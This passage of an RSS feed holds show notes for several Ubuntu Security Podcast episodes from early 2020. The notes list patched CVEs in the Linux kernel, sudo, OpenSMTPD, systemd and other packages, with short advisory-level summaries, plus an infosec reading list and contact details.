<li><a href="https://ubuntu.com/security/CVE-2019-19082">CVE-2019-19082</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19078">CVE-2019-19078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19077">CVE-2019-19077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19071">CVE-2019-19071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19063">CVE-2019-19063</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19057">CVE-2019-19057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19062">CVE-2019-19062</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19050">CVE-2019-19050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18811">CVE-2019-18811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18786">CVE-2019-18786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18683">CVE-2019-18683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16232">CVE-2019-16232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16229">CVE-2019-16229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15099">CVE-2019-15099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 kernel (eoan, bionic hwe)</li>
<li>Fix for Intel GPU state leak</li>
<li>Atheros Wifi NULL pointer dereference</li>
<li>2x Crypto subsystem memory leak</li>
<li>io_uring operations missing credentials checks - unprivileged user could
say add an address to the loopback interface as a result</li>
<li>Virtual console drivers missing checks on writes</li>
<li>OOB write in KVM (need access to /dev/kvm)</li>
<li>Memory corruption on x86 platforms due to a race in caching of floating
point registers between processors</li>
<li>NULL pointer dererefence in SCSI SAS Class driver due to a PHY down
race-condition during discovery</li>
</ul>
<h3 id="usn-4285-1-linux-kernel-vulnerabilities-07-58">[<a href="https://usn.ubuntu.com/4285-1/">USN-4285-1</a>] Linux kernel vulnerabilities [07:58]</h3>
<ul>
<li>12 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7053">CVE-2020-7053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5108">CVE-2019-5108</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20096">CVE-2019-20096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19965">CVE-2019-19965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19947">CVE-2019-19947</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19063">CVE-2019-19063</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19057">CVE-2019-19057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18809">CVE-2019-18809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18786">CVE-2019-18786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16232">CVE-2019-16232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16229">CVE-2019-16229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 kernel (orace, aws, gke, gcp, azure etc)</li>
<li>UAF in Intel i915 driver - crash / code exec</li>
<li>Wifi-based DoS when used in AP mode - could get AP to send location
updates to clients before a new client had finished authentication - so
then as an unauthenticated station could DoS other connected stations</li>
<li>Memory leak in Datagram Congestion Control Protocol (DCCP) - DoS</li>
<li>2 from above:
<ul>
<li>NULL ptr deref in SCSI SAS</li>
<li>Intel GPU info leak</li>
</ul>
</li>
</ul>
<h3 id="usn-4287-1-usn-4287-2-linux-kernel-vulnerabilities-08-46">[<a href="https://usn.ubuntu.com/4287-1/">USN-4287-1</a>, <a href="https://usn.ubuntu.com/4287-2/">USN-4287-2</a>] Linux kernel vulnerabilities [08:46]</h3>
<ul>
<li>22 CVEs addressed in Xenial, Bionic, Trusty ESM (Azure)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15291">CVE-2019-15291</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7053">CVE-2020-7053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5108">CVE-2019-5108</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20096">CVE-2019-20096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19965">CVE-2019-19965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19767">CVE-2019-19767</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19332">CVE-2019-19332</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19227">CVE-2019-19227</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19082">CVE-2019-19082</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19078">CVE-2019-19078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19071">CVE-2019-19071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19063">CVE-2019-19063</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19062">CVE-2019-19062</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19057">CVE-2019-19057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18885">CVE-2019-18885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18809">CVE-2019-18809</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18786">CVE-2019-18786</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18683">CVE-2019-18683</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16232">CVE-2019-16232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16229">CVE-2019-16229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15099">CVE-2019-15099</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 (bionic, xenial hwe)</li>
<li>i915 UAF, wifi AP DoS, DCCP memory leak, SCSI SAS NULL ptr deref, KVM OOB
write via /dev/kvm, crypto subsystem memory leak, atheros wifi NULL ptr
deref, i915 info leak</li>
</ul>
<h3 id="usn-4286-1-usn-4286-2-linux-kernel-vulnerabilities-09-44">[<a href="https://usn.ubuntu.com/4286-1/">USN-4286-1</a>, <a href="https://usn.ubuntu.com/4286-2/">USN-4286-2</a>] Linux kernel vulnerabilities [09:44]</h3>
<ul>
<li>12 CVEs addressed in Xenial, Trusty ESM (HWE)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-15221">CVE-2019-15221</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15217">CVE-2019-15217</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-5108">CVE-2019-5108</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20096">CVE-2019-20096</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19965">CVE-2019-19965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19068">CVE-2019-19068</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19066">CVE-2019-19066</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19056">CVE-2019-19056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19051">CVE-2019-19051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17351">CVE-2019-17351</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-15220">CVE-2019-15220</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 kernel</li>
<li>Intel GPU info leak, SCSI SAS NULL ptr deref, DCCP memory leak, wifi AP
DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-and-alex-discuss-their-recommended-reading-list-for-infosec-beginners-10-17">Joe and Alex discuss their recommended reading list for infosec beginners [10:17]</h3>
<ul>
<li>Red Team Field Manual | Ben Clark</li>
<li>Head First Programming</li>
<li>Linux System Administrators Handbook | Nemeth, et al</li>
<li>Robert Seacord’s Secure Coding in C/C++</li>
<li>CERT Resilience Management Model (CERT-RMM)</li>
<li>The Code Book | Simon Singh</li>
<li>The Tao of Network Security Monitoring: Beyond Intrusion Detection | Richard Bejtlich</li>
<li>The Cuckoos Egg | Cliff Stoll</li>
<li>Linux Pro Magazine</li>
<li>Black Hat Python | Justin Seitz</li>
<li>Hacking: The Art Of Exploitation | Jon Erickson</li>
</ul>
<h3 id="farewell-and-good-luck-tyler-hicks--tyhicks--25-05">Farewell and good luck Tyler Hicks (tyhicks) [25:05]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E063.mp3" length="25786539" type="audio/mpeg" /><itunes:duration>26:51</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 62
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-62/</link>
          <pubDate>Thu, 13 Feb 2020 21:53:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>cbcb26e438872f506b36e8e7b7ee21d106655701064861773b7ba0656374e5175dc4e6723661b01cf4f97a1528c9f5675d11820976fb85a19117a2e2c82c30bf</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 62</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week Alex and Joe take an indepth look at the recent Sudo
  vulnerability CVE-2019-18634 plus we look at security updates for
  OpenSMTPD, systemd, Mesa, Yubico PIV tool and more. We also look at a
  recent job opening for a Robotics...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week Alex and Joe take an indepth look at the recent Sudo
  vulnerability CVE-2019-18634 plus we look at security updates for
  OpenSMTPD, systemd, Mesa, Yubico PIV tool and more. We also look at a
  recent job opening for a Robotics Security Engineer to join the Ubuntu
  Security team.
  </itunes:summary>
        <description>  This week Alex and Joe take an indepth look at the recent Sudo
  vulnerability CVE-2019-18634 plus we look at security updates for
  OpenSMTPD, systemd, Mesa, Yubico PIV tool and more. We also look at a
  recent job opening for a Robotics Security Engineer to join the Ubuntu
  Security team.
  </description>
        <googleplay:description>  This week Alex and Joe take an indepth look at the recent Sudo
  vulnerability CVE-2019-18634 plus we look at security updates for
  OpenSMTPD, systemd, Mesa, Yubico PIV tool and more. We also look at a
  recent job opening for a Robotics Security Engineer to join the Ubuntu
  Security team.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Alex and Joe take an indepth look at the recent Sudo
vulnerability CVE-2019-18634 plus we look at security updates for
OpenSMTPD, systemd, Mesa, Yubico PIV tool and more. We also look at a
recent job opening for a Robotics Security Engineer to join the Ubuntu
Security team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>33 unique CVEs addressed</p>
<h3 id="usn-4263-2-sudo-vulnerability-00-41">[<a href="https://usn.ubuntu.com/4263-2/">USN-4263-2</a>] Sudo vulnerability [00:41]</h3>
<ul>
<li>1 CVEs addressed in Precise ESM, Trusty ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18634">CVE-2019-18634</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>See <a href="https://ubuntusecuritypodcast.org/episode-61/">Episode 61</a> and discussion later in episode</li>
</ul>
<h3 id="usn-4268-1-opensmtpd-vulnerability-01-02">[<a href="https://usn.ubuntu.com/4268-1/">USN-4268-1</a>] OpenSMTPD vulnerability [01:02]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7247">CVE-2020-7247</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Logic bug caused existing sanity checks on MAIL FROM field to be skipped
under certain scenarios - so by failing to perform this validation, could
allow an attacker to input shell metacharacters to obtain command
execution in smtpd (which runs as root) -&gt; remote root command execution.</li>
<li>Fixed to always perform sanity checks on MAIL FROM</li>
</ul>
<h3 id="usn-4269-1-systemd-vulnerabilities-02-06">[<a href="https://usn.ubuntu.com/4269-1/">USN-4269-1</a>] systemd vulnerabilities [02:06]</h3>
<ul>
<li>5 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1712">CVE-2020-1712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3844">CVE-2019-3844</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3843">CVE-2019-3843</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20386">CVE-2019-20386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16888">CVE-2018-16888</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap UAF when handing asynchronous policykit queries and dbus messages -
could allow possible root privesc</li>
<li>Possible sandbox escape through DynamicUser property on services via
setuid binaries to gain new privileges or created setgid binaries</li>
<li>Also DynamicUser services can create setuid/setgid binaries which could
then be used to escalate privileges after
<ul>
<li>Both low priority since not many users of DynamicUser services plus
requires cooperation between the service and a helper so can&rsquo;t be
directly exploited</li>
</ul>
</li>
<li>Memory leak in logind when executing udevadm trigger command</li>
<li>Possible to get systemd to kill the wrong process if can write to it&rsquo;s
PIDFile since the pid specified here is not validated</li>
</ul>
<h3 id="usn-4267-1-arm-mbed-tls-vulnerabilities-03-26">[<a href="https://usn.ubuntu.com/4267-1/">USN-4267-1</a>] ARM mbed TLS vulnerabilities [03:26]</h3>
<ul>
<li>5 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-0498">CVE-2018-0498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0497">CVE-2018-0497</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0488">CVE-2018-0488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0487">CVE-2018-0487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18187">CVE-2017-18187</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>lightweight crypto / TLS library</li>
<li>integer overflow -&gt; heap overflow -&gt; RCE / DoS</li>
<li>read buffer overflow in handling of certificate chains -&gt; DOS</li>
<li>2 different cache side-channel attacks which could allow a remote
attacker to recover partial plaintext for CBC modes</li>
</ul>
<h3 id="usn-4270-1-exiv2-vulnerability-04-22">[<a href="https://usn.ubuntu.com/4270-1/">USN-4270-1</a>] Exiv2 vulnerability [04:22]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-20421">CVE-2019-20421</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Infinite loop in JP2 image metadata parser -&gt; CPU DoS</li>
</ul>
<h3 id="usn-4271-1-mesa-vulnerability-04-38">[<a href="https://usn.ubuntu.com/4271-1/">USN-4271-1</a>] Mesa vulnerability [04:38]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-5068">CVE-2019-5068</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Created a shared memory segment with world readable and writable
permissions - so any local user could interfere with or access shared
memory buffers which are often used for back buffers to improve
performance - changed to open as only user readable / writable</li>
</ul>
<h3 id="usn-4272-1-pillow-vulnerabilities-05-24">[<a href="https://usn.ubuntu.com/4272-1/">USN-4272-1</a>] Pillow vulnerabilities [05:24]</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-5313">CVE-2020-5313</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-5311">CVE-2020-5311</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-5310">CVE-2020-5310</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-5312">CVE-2020-5312</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19911">CVE-2019-19911</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-16865">CVE-2019-16865</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python Image Library</li>
<li>Various errors in handling image formats -&gt; Crash -&gt; DoS, RCE etc</li>
</ul>
<h3 id="usn-4273-1-reportlab-vulnerability-05-48">[<a href="https://usn.ubuntu.com/4273-1/">USN-4273-1</a>] ReportLab vulnerability [05:48]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-17626">CVE-2019-17626</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python library used for creating PDFs</li>
<li>RCE via a crafted XML document - would eval() an argument which comes
from a document and so would execute arbitrary python code from the
document as a result</li>
</ul>
<h3 id="usn-4250-2-mariadb-vulnerability-06-21">[<a href="https://usn.ubuntu.com/4250-2/">USN-4250-2</a>] MariaDB vulnerability [06:21]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-2574">CVE-2020-2574</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-60/">Episode 60</a> for MySQL - similar update for MariaDB - unfortunately no
details from upstream</li>
</ul>
<h3 id="usn-4275-1-qt-vulnerabilities-06-45">[<a href="https://usn.ubuntu.com/4275-1/">USN-4275-1</a>] Qt vulnerabilities [06:45]</h3>
<ul>
<li>4 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-0570">CVE-2020-0570</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-0569">CVE-2020-0569</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-18281">CVE-2019-18281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19872">CVE-2018-19872</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 possible code execution bugs where Qt would search for plugins and
libraries in incorrect locations, allowing a local attacker to get code
execution</li>
<li>2 different buffer overflow vulnerabilities in handling PPM images and in
text files with many unicode directional characters</li>
</ul>
<h3 id="usn-4274-1-libxml2-vulnerabilities-07-20">[<a href="https://usn.ubuntu.com/4274-1/">USN-4274-1</a>] libxml2 vulnerabilities [07:20]</h3>
<ul>
<li>2 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-7595">CVE-2020-7595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19956">CVE-2019-19956</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Infinite loop for crafted XML documents -&gt; CPU DoS</li>
<li>Memory leak</li>
</ul>
<h3 id="usn-4276-1-yubico-piv-tool-vulnerabilities-07-41">[<a href="https://usn.ubuntu.com/4276-1/">USN-4276-1</a>] Yubico PIV Tool vulnerabilities [07:41]</h3>
<ul>
<li>2 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14780">CVE-2018-14780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14779">CVE-2018-14779</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Yubico PIV (personal identity verificatiion) smart card driver - can be
used with a Yubikey to do authentication</li>
<li>2 different buffer overflows able to be triggered by a malicious USB
device - could lead to possible code execution</li>
</ul>
<h3 id="usn-4277-1-libexif-vulnerabilities-08-14">[<a href="https://usn.ubuntu.com/4277-1/">USN-4277-1</a>] libexif vulnerabilities [08:14]</h3>
<ul>
<li>3 CVEs addressed in Precise ESM, Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9278">CVE-2019-9278</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-7544">CVE-2017-7544</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6328">CVE-2016-6328</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow (crash or RCE) and 2 buffer over reads (crash / info
disclosure)</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="alex-and-joe-discuss-the-recent-sudo-vulnerability--cve-2019-18634--08-46">Alex and Joe discuss the recent sudo vulnerability (<a href="https://ubuntu.com/security/CVE-2019-18634">CVE-2019-18634</a>) [08:46]</h3>
<ul>
<li><a href="https://threatpost.com/docker-registries-malware-data-theft/152734/">https://threatpost.com/docker-registries-malware-data-theft/152734/</a></li>
</ul>
<h3 id="hiring-22-07">Hiring [22:07]</h3>
<h4 id="robotics-security-engineer">Robotics Security Engineer</h4>
<ul>
<li><a href="https://canonical.com/careers/1550997">https://canonical.com/careers/1550997</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E062.mp3" length="23336881" type="audio/mpeg" /><itunes:duration>24:18</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 61
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-61/</link>
          <pubDate>Fri, 07 Feb 2020 16:15:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>4d1e94a8f9c93dcb3069ca36dde6b773552b0a61a06f811702d0567654b3a3405d3fb891a51518dba4d3afe8e4f57640dd0f2b354e75d1cdb8684c6f2f78bc28</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 61</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Joe is back to discuss a recent breach against Wawa, plus we detail
  security updates from the past week including Apache Solr, OpenStack
  Keystone, Sudo, Django and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Joe is back to discuss a recent breach against Wawa, plus we detail
  security updates from the past week including Apache Solr, OpenStack
  Keystone, Sudo, Django and more.
  </itunes:summary>
        <description>  Joe is back to discuss a recent breach against Wawa, plus we detail
  security updates from the past week including Apache Solr, OpenStack
  Keystone, Sudo, Django and more.
  </description>
        <googleplay:description>  Joe is back to discuss a recent breach against Wawa, plus we detail
  security updates from the past week including Apache Solr, OpenStack
  Keystone, Sudo, Django and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Joe is back to discuss a recent breach against Wawa, plus we detail
security updates from the past week including Apache Solr, OpenStack
Keystone, Sudo, Django and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>23 unique CVEs addressed</p>
<h3 id="usn-4259-1-apache-solr-vulnerability-00-50">[<a href="https://usn.ubuntu.com/4259-1/">USN-4259-1</a>] Apache Solr vulnerability [00:50]</h3>
<ul>
<li>1 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-12629">CVE-2017-12629</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Enterprise search server based on Lucene with XML/HTTP and JSON APIs</li>
<li>Was vulnerable to an XML External Entity (XXE) attack - XML can include a
reference to another XML resource which might then be fetched - this
could then be combined with another flaw (use of Config API to obtain
access to the RunExecutableListener class) to allow remote code fetched
from the remote XML</li>
</ul>
<h3 id="usn-4261-1-webkitgtk-plus-vulnerabilities-01-44">[<a href="https://usn.ubuntu.com/4261-1/">USN-4261-1</a>] WebKitGTK+ vulnerabilities [01:44]</h3>
<ul>
<li>3 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-8846">CVE-2019-8846</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8844">CVE-2019-8844</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-8835">CVE-2019-8835</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory management issues which could be triggered via a malicious
websites - possible remote code execution as a result</li>
</ul>
<h3 id="usn-4262-1-openstack-keystone-vulnerability-02-13">[<a href="https://usn.ubuntu.com/4262-1/">USN-4262-1</a>] OpenStack Keystone vulnerability [02:13]</h3>
<ul>
<li>1 CVEs addressed in Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-19687">CVE-2019-19687</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Keystone provides identity services (client authentication etc) for
OpenStack</li>
<li>credentials API allowed any user with a role on a project to list all
credentials when enforce_scope was false - so could view other users
credentials.</li>
<li>Was introduced in keystone 15 so didn&rsquo;t affect bionic or older releases -
only eoan</li>
</ul>
<h3 id="lsn-0062-1-linux-kernel-vulnerability-03-01">[LSN-0062-1] Linux kernel vulnerability [03:01]</h3>
<ul>
<li>7 CVEs addressed in Xenial and Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18885">CVE-2019-18885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14901">CVE-2019-14901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14897">CVE-2019-14897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14896">CVE-2019-14896</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14895">CVE-2019-14895</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14615">CVE-2019-14615</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-2214">CVE-2019-2214</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap and stack buffer overflows in Marvell Wifi drivers, Intel GPU info
leak on context switch, binder IPC heap buffer overflow</li>
</ul>
<h3 id="usn-4263-1-sudo-vulnerability-03-50">[<a href="https://usn.ubuntu.com/4263-1/">USN-4263-1</a>] Sudo vulnerability [03:50]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-18634">CVE-2019-18634</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Lots of press around this but most people would not be vulnerable since
need to run in an non-default configuration</li>
<li>When pwfeedback enabled in /etc/sudoers, stack buffer overflow able to be
triggered in sudo during password authentication</li>
<li>Not enabled by default in Ubuntu</li>
</ul>
